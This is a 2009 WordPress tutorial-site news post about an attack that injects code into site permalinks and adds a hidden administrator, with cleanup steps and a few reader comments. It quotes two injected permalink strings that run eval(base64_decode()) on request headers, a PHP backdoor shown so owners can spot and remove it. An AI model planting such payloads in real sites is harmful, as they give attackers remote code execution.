Sections »
Services »
Contact »
Free Wordpress Blog Setup

WordPress SQL Injection – Latest Attack

By Editorial Staff in News
WordPress SQL Injection – Latest Attack

A lot of sites are being hit by a recent SQL attack where codes are being injected to your site. This MySQL injection affects your permalinks by making them ineffective. As a result, your blog posts URLs will not work. Numerous WordPress blogs were targetted in this attack, Thanks to Andy Soward for bringing this to our attention.

There was one of the following codes that were added to your permalink structure due to this attack:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

These quotes appended all permalinks on your site and it can only be changed if removed manually.

To fix this go to:

Settings > Permalinks and remove the above code and replace your default code.

Next thing you need to do is go to Users. You will see that there are more than one administrator. You won’t see their name listed, but you will see the count increased. So what you need to do is look at all users and find the last one who registered. Put your mouse over that user and get the link. Change the code userid= by adding 1 to that number. So if the last user who you can see was user #2 then add 1 to it and make it 3. You should find the hidden admin has a weird code as a first name. Delete the code and make him a subscriber. Then return and delete him.

This should fix the problem. You can also delete him by simply going to your PHPMyAdmin. Because you will see the user there.

We just wanted to get this news out as soon as we can, so our users can be updated. Please make sure that you check that your blog is not infected. We hope that WordPress come out with a release soon.

Also if you haven’t implement some of these measures to secure your WordPress Admin Area.

What Next?

Digg it
Save This Page
Subscribe to WPBeginner
Stumble it

Related Posts

  1. Protect WordPress Against Malicious URL Requests
  2. How to Display the Latest Sticky Posts in WordPress
  3. How to Exclude Latest Post from the WordPress Post Loop
  4. Protect Your Admin folder in WordPress by Limiting Access in .htaccess
  5. WordPress 2.8.4 – A Crucial Security Release
Free Wordpress Blog Setup

Comments

4 Responses to “WordPress SQL Injection – Latest Attack”
  1. Roseli A. Bakar says:
    September 5, 2009 at 6:07 am

    Thanks for highlighting this :)

    Reply
  2. lerrkin says:
    October 2, 2009 at 10:59 pm

    Hi.
    Interesting url http://www.wpbeginner.com/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/ linked from here shows blank page.

    Code contains this comment: ‘‘.
    That’s WP Super Cache’s bug http://wordpress.org/support/topic/315446, and it seems present here… So update WP Super Cache, please. I hope read that tips soon :)

    Reply
    • Editorial Staff says:
      October 2, 2009 at 11:37 pm

      We really appreciate this comment, the issue was not with the WP Super Cache, we believe it was the plugin called WP External Link. We uninstalled and reinstalled WP-Super Cache twice, but then we compared the development server where everything worked fine. The difference was this plugin. When we removed that plugin it worked. You may now read that post.

      Reply
      • lerrkin says:
        October 3, 2009 at 12:56 pm

        Maybe that was WP External Link and Super Cache conflict…
        I see my pasted WP-Super-Cache html comment above works as html comment and is invisible :) Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
        So last Super Cache ver. promises to do not html validity check.

        Oh, I’m reading!
        Thanks a lot!

        Reply

Share Your Opinions

Tell us what you're thinking...
and if you want a pic to show with your comment, then get gravatar!

Please make sure that you have read our Comment Policy.

Due to high volume of request from our readers, we are adding this feature that allows you to stay updated with this post's comments without having to participate in the discussion even though we would love your input as always. Don't worry we hate SPAM just as much as you do, so you will never receive any SPAM messages from our site and that's our promise to you.

Subscribe without commenting

Subscribe via RSS Stay Updated via Twitter
SEARCH WPBEGINNER.COM
FEATURED ARTICLES
JOIN US ON FACEBOOK
Close Bar

Copyright & Usage

© 2009 - 2010 WPBeginner.
WPBeginner Disclaimer

The techniques demonstrated in WPBeginner tutorials can be used in whatever manner you wish without attribution.

Copyright to all Themes, Plugins, and Tutorials belong to their respective owners. Everything else on this site is copyrighted by WPBeginner.

You may not copy whole tutorials nor should you translate it to another language without written permission from WPBeginner.

Write a Tutorial

Writing an article at WPBeginner is not only a great way to get exposure, but it is a great way to give back to the community. We value all of our contributors, and we reward them with link back to their sites and products.

Write for Us
Editors & Contributors

Suggestions?

WPBeginner was started for YOU, so if you have suggestions or feedback on how we can improve, please let us know. If you want to see a specific topic covered, answer to a specific wordpress question, or anything else of this sort, don't hesitate to ask just let us know. We do our best to keep up!

Make a Suggestion

Resources

HyperArts Blog
N.Design Studio
Six Revisions
SmashingApps
WordPress Codex
WordPress Plugins
WordPress Themes
Powered by Wordpress Designed by Uzzz Productions WPBeginner - Your Source for Wordpress Tutorials